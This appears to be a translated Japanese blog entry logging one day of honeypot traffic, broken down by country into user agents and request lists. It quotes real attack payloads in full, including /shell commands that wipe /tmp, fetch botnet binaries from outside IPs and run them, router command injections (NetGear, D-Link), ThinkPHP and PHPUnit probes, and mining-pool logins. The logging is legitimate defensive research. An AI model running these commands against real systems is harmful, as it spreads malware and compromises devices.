コンニチハレバレトシタアオゾラ

In idle hours, all day long, facing my blog, as I aimlessly write down the trifling things that drift through my mind,

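2022/07/03 Honeypot (provisional) observation record

This is the honeypot (provisional) observation record for 2022/07/03.

Characteristics
Common

Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting GPON router vulnerabilities
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Access targeting ThinkPHP vulnerabilities
Scanning for /.env
Scanning for Apache Solr
Scanning for Laravel

Location:JP

Access targeting JBoss vulnerabilities
Scanning for /.aws
Scanning for /.git
Scanning for Apache Tomcat
Access with the UserAgent "Hello, world"

The above were observed.

The following access to /shell was observed.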

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://137.184.210.50/bins/aqua.mpsl;
sh /tmp/aqua.mpsl

Location:US

Scanning for /.git
Scanning for WordPress

The above were observed.

The following access to /shell was observed.

cd /tmp;
rm -rf *;
wget  91.218.67.131/reaper/reap.arm4;
chmod 777 /tmp/reap.arm4;
sh /tmp/reap.arm4

Location:UK

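Access targeting D-link product vulnerabilities
Access targeting JBoss vulnerabilities
Access targeting NetGear product vulnerabilities
Scanning for /.git
Scanning for Apache Tomcat

The above were observed.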

Location:SG

Access targeting D-link product vulnerabilities
Scanning for phpMyAdmin

The above were observed.

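Access count trend

JP: Total accesses: 212 (change from previous day: 136)
US: Total accesses: 65 (change from previous day: -93)
UK: Total accesses: 50 (change from previous day: -576)
SG: Total accesses: 43 (change from previous day: -37)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.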

Location:JP

UserAgent list

Count UserAgent
7 -
2 Hello, world
1 Mozila/5.0
1 Mozilla/2.02E (Win95; U)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
39 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
36 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
9 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 nvdorz
92 python-requests/2.28.1

Request list

Count Method Request Protocol
1 \x03
1 \x16\x03\x01\x01D\x01
1 \x16\x03\x01
1 GET /%25EXT%25.php HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
36 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /123.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2m5c2lwt HTTP/1.1
1 GET /Black.php HTTP/1.1
1 GET /Server.php HTTP/1.1
1 GET /__test.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /a.php HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin.php3 HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/ajax.php?module=recordings HTTP/1.0
1 GET /adminphp.php HTTP/1.1
1 GET /amministratore.php HTTP/1.1
1 GET /api.php HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /asdf.php HTTP/1.1
1 GET /auth/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /cgi-bin/printenv.pl HTTP/1.1
1 GET /check.php HTTP/1.1
1 GET /cli/.env HTTP/1.1
1 GET /conf.inc.php~ HTTP/1.1
1 GET /conf.php.old HTTP/1.1
1 GET /conf.php.swp HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /configuration.php HTTP/1.1
1 GET /conflg.php HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /dependencies/.env HTTP/1.1
1 GET /deployment/.env HTTP/1.1
1 GET /dev.php HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /document/.env HTTP/1.1
1 GET /engine/.env HTTP/1.1
1 GET /env.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /framework/.env HTTP/1.1
1 GET /frontend/.env HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /i.php HTTP/1.1
1 GET /index-test.php HTTP/1.1
1 GET /index.php3 HTTP/1.1
1 GET /index.php4 HTTP/1.1
1 GET /index.php5 HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index2.php HTTP/1.1
1 GET /index3.php HTTP/1.1
2 GET /info.php HTTP/1.1
2 GET /infophp.php HTTP/1.1
1 GET /infos.php HTTP/1.1
1 GET /invoker/readonly HTTP/1.1
1 GET /isadmin.php HTTP/1.1
1 GET /jenkins/login HTTP/1.1
2 GET /jo.php HTTP/1.1
1 GET /laravel-artisa/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /lindex.php HTTP/1.1
1 GET /linusadmin-phpinfo.php HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login/.env HTTP/1.1
1 GET /login/ HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /master/.env HTTP/1.1
1 GET /new.php HTTP/1.1
1 GET /old_phpinfo.php HTTP/1.1
1 GET /p.php HTTP/1.1
1 GET /personal/.env HTTP/1.1
1 GET /php-backdoor.php HTTP/1.1
1 GET /php-info.php HTTP/1.1
1 GET /php.ini HTTP/1.1
1 GET /php.php HTTP/1.1
1 GET /php1.php HTTP/1.1
1 GET /php_info.php HTTP/1.1
1 GET /phpinfo.php3 HTTP/1.1
1 GET /phpinfo.php4 HTTP/1.1
1 GET /phpinfo.php5 HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /phpinfos.php HTTP/1.1
1 GET /phpstudy.php HTTP/1.1
1 GET /phptest.php HTTP/1.1
1 GET /phpversion.php HTTP/1.1
1 GET /pi.php5 HTTP/1.1
1 GET /pi.php HTTP/1.1
1 GET /pinfo.php HTTP/1.1
1 GET /pop_profile.php HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /project/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /qq.php HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /s.php HTTP/1.1
1 GET /sa.php HTTP/1.1
1 GET /sa2.php HTTP/1.1
1 GET /script HTTP/1.1
1 GET /search/.env HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//137[.]184[.]210[.]50/bins/aqua.mpsl;sh+/tmp/aqua.mpsl HTTP/1.1
1 GET /simple-backdoor.php HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /status.php HTTP/1.1
1 GET /sypex.php HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /temp.php HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /test0.php HTTP/1.1
1 GET /test1.php HTTP/1.1
1 GET /test123.php HTTP/1.1
1 GET /test1 HTTP/1.1
1 GET /test2.php HTTP/1.1
1 GET /test2 HTTP/1.1
1 GET /test3.php HTTP/1.1
1 GET /test4.php HTTP/1.1
1 GET /test5.php HTTP/1.1
1 GET /test6.php HTTP/1.1
1 GET /test7.php HTTP/1.1
1 GET /test8.php HTTP/1.1
1 GET /test9.php HTTP/1.1
1 GET /test_ip.php HTTP/1.1
1 GET /testphp.php HTTP/1.1
1 GET /time.php HTTP/1.1
1 GET /up.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /view.php HTTP/1.1
1 GET /vue/.env HTTP/1.1
1 GET /w.php HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /webmaster.php HTTP/1.1
1 GET /weixiao.php HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /editBlackAndWhiteList HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

UserAgent list

Count UserAgent
8 -
2 Mozila/5.0
1 Mozilla/5.0 (Linux; Android 11; SM-A515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
16 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
1 Mozilla/5.0 (X11; CrOS x86_64 14588.98.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.59 Safari/537.36
18 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0

Request list

Count Method Request Protocol
1 \x03
1 \x16\x03\x01\x02
1 {\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"49yZYiE3R2nhxN2GtgVU2k2qHAUynMpdz6aqhP7DrKCtSgqGBnaqZ9w45bQHZvy5zYSP6AzVHk67FAjJrUzc7ZVUAc11DGa\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n
1 {\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x39ab0a1631185dd0a25bdf60df706389cf9001ed\",\"x\"],\"jsonrpc\":\"2.0\"}\n
1 {\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n
1 {\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n
19 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /login/ HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 91.218.67.131/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-content/ HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
2 HEAD /cdn-cgi/trace HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
2 POST /editBlackAndWhiteList HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0

Location:UK

UserAgent list

Count UserAgent
17 -
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
1 Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36

Request list

Count Method Request Protocol
1 \x16\x03\x01\x01D\x01
3 \x16\x03\x01
1 CONNECT api4.my-ip[.]io:443 HTTP/1.1
1 CONNECT api6.my-ip[.]io:443 HTTP/1.1
1 CONNECT www.proxy-listen[.]de:443 HTTP/1.1
3 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=hgbwsp30 HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /invoker/readonly HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /login/ HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /script HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]41[.]186[.]100:39375/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//azenv[.]net/ HTTP/1.1
1 GET http[:]//v4[.]ipv6-test.com/json/widgetdata.php?callback=? HTTP/1.1
1 GET http[:]//v6[.]ipv6-test.com/json/widgetdata.php?callback=? HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /_ignition/execute-solution HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /editBlackAndWhiteList HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0

Location:SG

UserAgent list

Count UserAgent
3 -
1 Hakai/2.0
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
23 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0

Request list

Count Method Request Protocol
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
22 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /login.cgi?cli=aa%20aa%27;wget%20http[:]//134[.]195[.]138[.]33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1